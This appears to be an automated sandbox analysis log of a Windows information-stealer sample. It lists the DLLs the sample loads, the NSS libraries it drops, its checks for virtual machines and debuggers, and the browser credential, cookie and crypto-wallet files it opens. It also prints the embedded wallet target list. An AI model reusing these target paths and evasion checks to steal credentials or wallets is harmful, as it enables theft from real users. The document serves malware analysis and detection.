Source: C:\Users\user\Desktop\4c469e2cf403fea6249e835ddce23de2.exe Section loaded: msimg32.dll
Source: C:\Users\user\Desktop\4c469e2cf403fea6249e835ddce23de2.exe Section loaded: mpr.dll
Source: C:\Users\user\Desktop\4c469e2cf403fea6249e835ddce23de2.exe Section loaded: oleacc.dll
Source: C:\Users\user\Desktop\4c469e2cf403fea6249e835ddce23de2.exe Section loaded: winmm.dll
Source: C:\Users\user\Desktop\4c469e2cf403fea6249e835ddce23de2.exe Section loaded: wininet.dll
Source: C:\Users\user\Desktop\4c469e2cf403fea6249e835ddce23de2.exe Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\4c469e2cf403fea6249e835ddce23de2.exe Section loaded: rstrtmgr.dll
Source: C:\Users\user\Desktop\4c469e2cf403fea6249e835ddce23de2.exe Section loaded: ncrypt.dll
Source: C:\Users\user\Desktop\4c469e2cf403fea6249e835ddce23de2.exe Section loaded: ntasn1.dll
Source: C:\Users\user\Desktop\4c469e2cf403fea6249e835ddce23de2.exe Section loaded: iertutil.dll
Source: C:\Users\user\Desktop\4c469e2cf403fea6249e835ddce23de2.exe Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\4c469e2cf403fea6249e835ddce23de2.exe Section loaded: wldp.dll
Source: C:\Users\user\Desktop\4c469e2cf403fea6249e835ddce23de2.exe Section loaded: profapi.dll
Source: C:\Users\user\Desktop\4c469e2cf403fea6249e835ddce23de2.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\4c469e2cf403fea6249e835ddce23de2.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\Desktop\4c469e2cf403fea6249e835ddce23de2.exe Section loaded: winhttp.dll
Source: C:\Users\user\Desktop\4c469e2cf403fea6249e835ddce23de2.exe Section loaded: mswsock.dll
Source: C:\Users\user\Desktop\4c469e2cf403fea6249e835ddce23de2.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\Desktop\4c469e2cf403fea6249e835ddce23de2.exe Section loaded: winnsi.dll
Source: C:\Users\user\Desktop\4c469e2cf403fea6249e835ddce23de2.exe Section loaded: urlmon.dll
Source: C:\Users\user\Desktop\4c469e2cf403fea6249e835ddce23de2.exe Section loaded: srvcli.dll
Source: C:\Users\user\Desktop\4c469e2cf403fea6249e835ddce23de2.exe Section loaded: netutils.dll
Source: C:\Users\user\Desktop\4c469e2cf403fea6249e835ddce23de2.exe Section loaded: dpapi.dll
Source: C:\Users\user\Desktop\4c469e2cf403fea6249e835ddce23de2.exe Section loaded: cryptbase.dll
Source: C:\Users\user\Desktop\4c469e2cf403fea6249e835ddce23de2.exe Section loaded: ntmarta.dll
Source: C:\Users\user\Desktop\4c469e2cf403fea6249e835ddce23de2.exe Section loaded: mozglue.dll
Source: C:\Users\user\Desktop\4c469e2cf403fea6249e835ddce23de2.exe Section loaded: wsock32.dll
Source: C:\Users\user\Desktop\4c469e2cf403fea6249e835ddce23de2.exe Section loaded: vcruntime140.dll
Source: C:\Users\user\Desktop\4c469e2cf403fea6249e835ddce23de2.exe Section loaded: msvcp140.dll
Source: C:\Users\user\Desktop\4c469e2cf403fea6249e835ddce23de2.exe Section loaded: vcruntime140.dll
Source: C:\Users\user\Desktop\4c469e2cf403fea6249e835ddce23de2.exe Section loaded: windowscodecs.dll
Source: C:\Users\user\Desktop\4c469e2cf403fea6249e835ddce23de2.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32
Source: C:\Users\user\Desktop\4c469e2cf403fea6249e835ddce23de2.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\13.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001
Source: 4c469e2cf403fea6249e835ddce23de2.exe Static PE information: Virtual size of .text is bigger than: 0x100000
Source: 4c469e2cf403fea6249e835ddce23de2.exe Static file information: File size 14201936 > 1048576
Source: 4c469e2cf403fea6249e835ddce23de2.exe Static PE information: section name: RT_CURSOR
Source: 4c469e2cf403fea6249e835ddce23de2.exe Static PE information: section name: RT_BITMAP
Source: 4c469e2cf403fea6249e835ddce23de2.exe Static PE information: section name: RT_ICON
Source: 4c469e2cf403fea6249e835ddce23de2.exe Static PE information: section name: RT_MENU
Source: 4c469e2cf403fea6249e835ddce23de2.exe Static PE information: section name: RT_DIALOG
Source: 4c469e2cf403fea6249e835ddce23de2.exe Static PE information: section name: RT_STRING
Source: 4c469e2cf403fea6249e835ddce23de2.exe Static PE information: section name: RT_ACCELERATOR
Source: 4c469e2cf403fea6249e835ddce23de2.exe Static PE information: section name: RT_GROUP_ICON
Source: 4c469e2cf403fea6249e835ddce23de2.exe Static PE information: Raw size of .text is bigger than: 0x100000 < 0x19ce00
Source: 4c469e2cf403fea6249e835ddce23de2.exe Static PE information: Raw size of .rsrc is bigger than: 0x100000 < 0x8f5000
Source: 4c469e2cf403fea6249e835ddce23de2.exe Static PE information: Raw size of .reloc is bigger than: 0x100000 < 0x29ae00
Source: 4c469e2cf403fea6249e835ddce23de2.exe Static PE information: More than 200 imports for USER32.dll
Source: 4c469e2cf403fea6249e835ddce23de2.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: 4c469e2cf403fea6249e835ddce23de2.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Binary string: mozglue.pdbP source: 4c469e2cf403fea6249e835ddce23de2.exe, 00000000.00000002.1962494191.000000006F8DD000.00000002.00000001.01000000.00000008.sdmp, mozglue[1].dll.0.dr, mozglue.dll.0.dr
Source: Binary string: z:\build-dev\usbnet5.Mon_05_17_2021_16_10_12.10\projects\usbnet5\src\virt\shell\Release\usbclient.pdb0@_\9] source: 4c469e2cf403fea6249e835ddce23de2.exe
Source: Binary string: freebl3.pdb source: freebl3[1].dll.0.dr, freebl3.dll.0.dr
Source: Binary string: freebl3.pdbp source: freebl3[1].dll.0.dr, freebl3.dll.0.dr
Source: Binary string: nss3.pdb@ source: 4c469e2cf403fea6249e835ddce23de2.exe, 00000000.00000002.1962304971.000000006C8CF000.00000002.00000001.01000000.00000007.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr
Source: Binary string: z:\build-dev\usbnet5.Mon_05_17_2021_16_10_12.10\projects\usbnet5\src\virt\shell\Release\usbclient.pdb source: 4c469e2cf403fea6249e835ddce23de2.exe
Source: Binary string: softokn3.pdb@ source: softokn3[1].dll.0.dr, softokn3.dll.0.dr
Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: vcruntime140.dll.0.dr, vcruntime140[1].dll.0.dr
Source: Binary string: z:\build-dev\usbnet5.Mon_05_17_2021_16_10_12.10\projects\usbnet5\src\virt\shell\Release\usbclient.pdb0@ source: 4c469e2cf403fea6249e835ddce23de2.exe, 00000000.00000002.1937425066.0000000000B4E000.00000002.00000001.01000000.00000003.sdmp, 4c469e2cf403fea6249e835ddce23de2.exe, 00000000.00000000.1696785302.0000000000B4E000.00000002.00000001.01000000.00000003.sdmp
Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\msvcp140.i386.pdb source: msvcp140[1].dll.0.dr, msvcp140.dll.0.dr
Source: Binary string: nss3.pdb source: 4c469e2cf403fea6249e835ddce23de2.exe, 00000000.00000002.1962304971.000000006C8CF000.00000002.00000001.01000000.00000007.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr
Source: Binary string: mozglue.pdb source: 4c469e2cf403fea6249e835ddce23de2.exe, 00000000.00000002.1962494191.000000006F8DD000.00000002.00000001.01000000.00000008.sdmp, mozglue[1].dll.0.dr, mozglue.dll.0.dr
Source: Binary string: softokn3.pdb source: softokn3[1].dll.0.dr, softokn3.dll.0.dr
Source: C:\Users\user\Desktop\4c469e2cf403fea6249e835ddce23de2.exe Code function: 0_2_009CF090 std::exception::exception,__CxxThrowException@8,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetLastError,SetLastError, 0_2_009CF090
Source: freebl3[1].dll.0.dr Static PE information: section name: .00cfg
Source: mozglue.dll.0.dr Static PE information: section name: .00cfg
Source: mozglue[1].dll.0.dr Static PE information: section name: .00cfg
Source: msvcp140.dll.0.dr Static PE information: section name: .didat
Source: msvcp140[1].dll.0.dr Static PE information: section name: .didat
Source: nss3.dll.0.dr Static PE information: section name: .00cfg
Source: nss3[1].dll.0.dr Static PE information: section name: .00cfg
Source: softokn3.dll.0.dr Static PE information: section name: .00cfg
Source: softokn3[1].dll.0.dr Static PE information: section name: .00cfg
Source: freebl3.dll.0.dr Static PE information: section name: .00cfg
Source: C:\Users\user\Desktop\4c469e2cf403fea6249e835ddce23de2.exe Code function: 0_2_00B1B9AF push ecx; ret 0_2_00B1B9C2
Source: C:\Users\user\Desktop\4c469e2cf403fea6249e835ddce23de2.exe Code function: 0_2_00B1BBB5 push ecx; ret 0_2_00B1BBC8
Source: C:\Users\user\Desktop\4c469e2cf403fea6249e835ddce23de2.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\freebl3[1].dll
Source: C:\Users\user\Desktop\4c469e2cf403fea6249e835ddce23de2.exe File created: C:\ProgramData\mozglue.dll
Source: C:\Users\user\Desktop\4c469e2cf403fea6249e835ddce23de2.exe File created: C:\ProgramData\nss3.dll
Source: C:\Users\user\Desktop\4c469e2cf403fea6249e835ddce23de2.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\vcruntime140[1].dll
Source: C:\Users\user\Desktop\4c469e2cf403fea6249e835ddce23de2.exe File created: C:\ProgramData\msvcp140.dll
Source: C:\Users\user\Desktop\4c469e2cf403fea6249e835ddce23de2.exe File created: C:\ProgramData\freebl3.dll
Source: C:\Users\user\Desktop\4c469e2cf403fea6249e835ddce23de2.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\msvcp140[1].dll
Source: C:\Users\user\Desktop\4c469e2cf403fea6249e835ddce23de2.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\softokn3[1].dll
Source: C:\Users\user\Desktop\4c469e2cf403fea6249e835ddce23de2.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\mozglue[1].dll
Source: C:\Users\user\Desktop\4c469e2cf403fea6249e835ddce23de2.exe File created: C:\ProgramData\vcruntime140.dll
Source: C:\Users\user\Desktop\4c469e2cf403fea6249e835ddce23de2.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\nss3[1].dll
Source: C:\Users\user\Desktop\4c469e2cf403fea6249e835ddce23de2.exe File created: C:\ProgramData\softokn3.dll
Source: C:\Users\user\Desktop\4c469e2cf403fea6249e835ddce23de2.exe Code function: 0_2_009B7C20 GetClientRect,PtInRect,MapWindowPoints,SendMessageW,SetRectEmpty,RedrawWindow,ReleaseCapture,SetCapture,ReleaseCapture,SetCapture,SendMessageW,UpdateWindow,SendMessageW,IsWindow,IsIconic,IsZoomed,IsWindow,UpdateWindow, 0_2_009B7C20
Source: C:\Users\user\Desktop\4c469e2cf403fea6249e835ddce23de2.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\freebl3[1].dll
Source: C:\Users\user\Desktop\4c469e2cf403fea6249e835ddce23de2.exe Dropped PE file which has not been started: C:\ProgramData\nss3.dll
Source: C:\Users\user\Desktop\4c469e2cf403fea6249e835ddce23de2.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\vcruntime140[1].dll
Source: C:\Users\user\Desktop\4c469e2cf403fea6249e835ddce23de2.exe Dropped PE file which has not been started: C:\ProgramData\freebl3.dll
Source: C:\Users\user\Desktop\4c469e2cf403fea6249e835ddce23de2.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\msvcp140[1].dll
Source: C:\Users\user\Desktop\4c469e2cf403fea6249e835ddce23de2.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\softokn3[1].dll
Source: C:\Users\user\Desktop\4c469e2cf403fea6249e835ddce23de2.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\mozglue[1].dll
Source: C:\Users\user\Desktop\4c469e2cf403fea6249e835ddce23de2.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\nss3[1].dll
Source: C:\Users\user\Desktop\4c469e2cf403fea6249e835ddce23de2.exe Dropped PE file which has not been started: C:\ProgramData\softokn3.dll
Source: C:\Users\user\Desktop\4c469e2cf403fea6249e835ddce23de2.exe API coverage: 0.2 %
Source: C:\Users\user\Desktop\4c469e2cf403fea6249e835ddce23de2.exe Code function: 0_2_6C7AEBF0 PR_GetNumberOfProcessors,GetSystemInfo, 0_2_6C7AEBF0
Source: C:\Users\user\Desktop\4c469e2cf403fea6249e835ddce23de2.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\
Source: C:\Users\user\Desktop\4c469e2cf403fea6249e835ddce23de2.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\
Source: C:\Users\user\Desktop\4c469e2cf403fea6249e835ddce23de2.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\
Source: C:\Users\user\Desktop\4c469e2cf403fea6249e835ddce23de2.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\
Source: C:\Users\user\Desktop\4c469e2cf403fea6249e835ddce23de2.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\
Source: C:\Users\user\Desktop\4c469e2cf403fea6249e835ddce23de2.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\
Source: 4c469e2cf403fea6249e835ddce23de2.exe, 00000000.00000002.1939639884.0000000001D38000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: VMwareVMware!
Source: 4c469e2cf403fea6249e835ddce23de2.exe, 00000000.00000002.1939639884.0000000001D38000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: VMwareVMware
Source: 4c469e2cf403fea6249e835ddce23de2.exe, 00000000.00000002.1939639884.0000000001D51000.00000004.00000020.00020000.00000000.sdmp, 4c469e2cf403fea6249e835ddce23de2.exe, 00000000.00000002.1939639884.0000000001D96000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: C:\Users\user\Desktop\4c469e2cf403fea6249e835ddce23de2.exe Process information queried: ProcessInformation
Source: C:\Users\user\Desktop\4c469e2cf403fea6249e835ddce23de2.exe Code function: 0_2_00B17527 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 0_2_00B17527
Source: C:\Users\user\Desktop\4c469e2cf403fea6249e835ddce23de2.exe Code function: 0_2_00B20657 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_00B20657
Source: C:\Users\user\Desktop\4c469e2cf403fea6249e835ddce23de2.exe Code function: 0_2_6C87AC62 IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_6C87AC62
Source: C:\Users\user\Desktop\4c469e2cf403fea6249e835ddce23de2.exe Memory protected: page guard

HIPS / PFW / Operating System Protection Evasion

Source: Yara match File source: Process Memory Space: 4c469e2cf403fea6249e835ddce23de2.exe PID: 6900, type: MEMORYSTR
Source: C:\Users\user\Desktop\4c469e2cf403fea6249e835ddce23de2.exe Code function: 0_2_009B1140 _malloc,InitializeSecurityDescriptor,SetSecurityDescriptorDacl,_free, 0_2_009B1140
Source: C:\Users\user\Desktop\4c469e2cf403fea6249e835ddce23de2.exe Code function: 0_2_6C87AE71 cpuid 0_2_6C87AE71
Source: C:\Users\user\Desktop\4c469e2cf403fea6249e835ddce23de2.exe Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: C:\Users\user\Desktop\4c469e2cf403fea6249e835ddce23de2.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\Desktop\4c469e2cf403fea6249e835ddce23de2.exe Code function: 0_2_00B2010B GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter, 0_2_00B2010B
Source: C:\Users\user\Desktop\4c469e2cf403fea6249e835ddce23de2.exe Code function: 0_2_00A2F4D1 _memset,GetVersionExW, 0_2_00A2F4D1

Stealing of Sensitive Information

Source: Yara match File source: 00000000.00000002.1940177043.0000000003D18000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.1939639884.0000000001D51000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: 4c469e2cf403fea6249e835ddce23de2.exe PID: 6900, type: MEMORYSTR
Source: Yara match File source: dump.pcap, type: PCAP
Source: 4c469e2cf403fea6249e835ddce23de2.exe, 00000000.00000002.1940177043.0000000003D73000.00000040.00000020.00020000.00000000.sdmp String found in binary or memory: Electrum
Source: 4c469e2cf403fea6249e835ddce23de2.exe, 00000000.00000002.1940177043.0000000003D18000.00000040.00000020.00020000.00000000.sdmp String found in binary or memory: ckstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: 4c469e2cf403fea6249e835ddce23de2.exe, 00000000.00000002.1940177043.0000000003D73000.00000040.00000020.00020000.00000000.sdmp String found in binary or memory: \Electrum\wallets\
Source: 4c469e2cf403fea6249e835ddce23de2.exe, 00000000.00000002.1940177043.0000000003DAB000.00000040.00000020.00020000.00000000.sdmp String found in binary or memory: Jaxx Desktop
Source: 4c469e2cf403fea6249e835ddce23de2.exe, 00000000.00000002.1940177043.0000000003D73000.00000040.00000020.00020000.00000000.sdmp String found in binary or memory: window-state.json
Source: 4c469e2cf403fea6249e835ddce23de2.exe, 00000000.00000002.1940177043.0000000003D73000.00000040.00000020.00020000.00000000.sdmp String found in binary or memory: exodus.conf.json
Source: 4c469e2cf403fea6249e835ddce23de2.exe, 00000000.00000002.1939639884.0000000001D7B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: \??\C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\passphrase.json
Source: 4c469e2cf403fea6249e835ddce23de2.exe, 00000000.00000002.1940177043.0000000003D73000.00000040.00000020.00020000.00000000.sdmp String found in binary or memory: info.seco
Source: 4c469e2cf403fea6249e835ddce23de2.exe, 00000000.00000002.1940177043.0000000003D73000.00000040.00000020.00020000.00000000.sdmp String found in binary or memory: ElectrumLTC
Source: 4c469e2cf403fea6249e835ddce23de2.exe, 00000000.00000002.1939639884.0000000001D7B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: C:\Users\user\AppData\Roaming\\Ethereum\\keystoreF
Source: 4c469e2cf403fea6249e835ddce23de2.exe, 00000000.00000002.1939639884.0000000001D96000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: \??\C:\Users\user\AppData\Roaming\Binance\simple-storage.json2
Source: 4c469e2cf403fea6249e835ddce23de2.exe, 00000000.00000002.1940177043.0000000003DAB000.00000040.00000020.00020000.00000000.sdmp String found in binary or memory: file__0.localstorage
Source: 4c469e2cf403fea6249e835ddce23de2.exe, 00000000.00000002.1939639884.0000000001D7B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: C:\Users\user\AppData\Roaming\\Ethereum\\keystoreF
Source: 4c469e2cf403fea6249e835ddce23de2.exe, 00000000.00000002.1940177043.0000000003D18000.00000040.00000020.00020000.00000000.sdmp String found in binary or memory: ckstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: 4c469e2cf403fea6249e835ddce23de2.exe, 00000000.00000002.1939639884.0000000001D7B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: \??\C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\passphrase.json
Source: 4c469e2cf403fea6249e835ddce23de2.exe, 00000000.00000002.1940177043.0000000003DA1000.00000040.00000020.00020000.00000000.sdmp String found in binary or memory: MultiDoge
Source: 4c469e2cf403fea6249e835ddce23de2.exe, 00000000.00000002.1940177043.0000000003D73000.00000040.00000020.00020000.00000000.sdmp String found in binary or memory: seed.seco
Source: 4c469e2cf403fea6249e835ddce23de2.exe, 00000000.00000002.1939639884.0000000001D7B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: C:\Users\user\AppData\Roaming\\Ethereum\\keystoreF
Source: 4c469e2cf403fea6249e835ddce23de2.exe, 00000000.00000002.1939639884.0000000001D7B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: \??\C:\Users\user\AppData\Roaming\Ledger Live\*.*
Source: 4c469e2cf403fea6249e835ddce23de2.exe, 00000000.00000002.1940177043.0000000003D73000.00000040.00000020.00020000.00000000.sdmp String found in binary or memory: \Electrum-LTC\wallets\
Source: C:\Users\user\Desktop\4c469e2cf403fea6249e835ddce23de2.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\monero-project\monero-core
Source: C:\Users\user\Desktop\4c469e2cf403fea6249e835ddce23de2.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
Source: C:\Users\user\Desktop\4c469e2cf403fea6249e835ddce23de2.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite-wal
Source: C:\Users\user\Desktop\4c469e2cf403fea6249e835ddce23de2.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Users\user\Desktop\4c469e2cf403fea6249e835ddce23de2.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite-shm
Source: C:\Users\user\Desktop\4c469e2cf403fea6249e835ddce23de2.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Users\user\Desktop\4c469e2cf403fea6249e835ddce23de2.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
Source: C:\Users\user\Desktop\4c469e2cf403fea6249e835ddce23de2.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Users\user\Desktop\4c469e2cf403fea6249e835ddce23de2.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite-shm
Source: C:\Users\user\Desktop\4c469e2cf403fea6249e835ddce23de2.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.js
Source: C:\Users\user\Desktop\4c469e2cf403fea6249e835ddce23de2.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite
Source: C:\Users\user\Desktop\4c469e2cf403fea6249e835ddce23de2.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite-wal
Source: C:\Users\user\Desktop\4c469e2cf403fea6249e835ddce23de2.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite
Source: C:\Users\user\Desktop\4c469e2cf403fea6249e835ddce23de2.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: C:\Users\user\Desktop\4c469e2cf403fea6249e835ddce23de2.exe File opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml
Source: C:\Users\user\Desktop\4c469e2cf403fea6249e835ddce23de2.exe File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets\
Source: C:\Users\user\Desktop\4c469e2cf403fea6249e835ddce23de2.exe File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\
Source: C:\Users\user\Desktop\4c469e2cf403fea6249e835ddce23de2.exe File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\
Source: C:\Users\user\Desktop\4c469e2cf403fea6249e835ddce23de2.exe File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\
Source: C:\Users\user\Desktop\4c469e2cf403fea6249e835ddce23de2.exe File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\
Source: C:\Users\user\Desktop\4c469e2cf403fea6249e835ddce23de2.exe File opened: C:\Users\user\AppData\Roaming\Exodus\
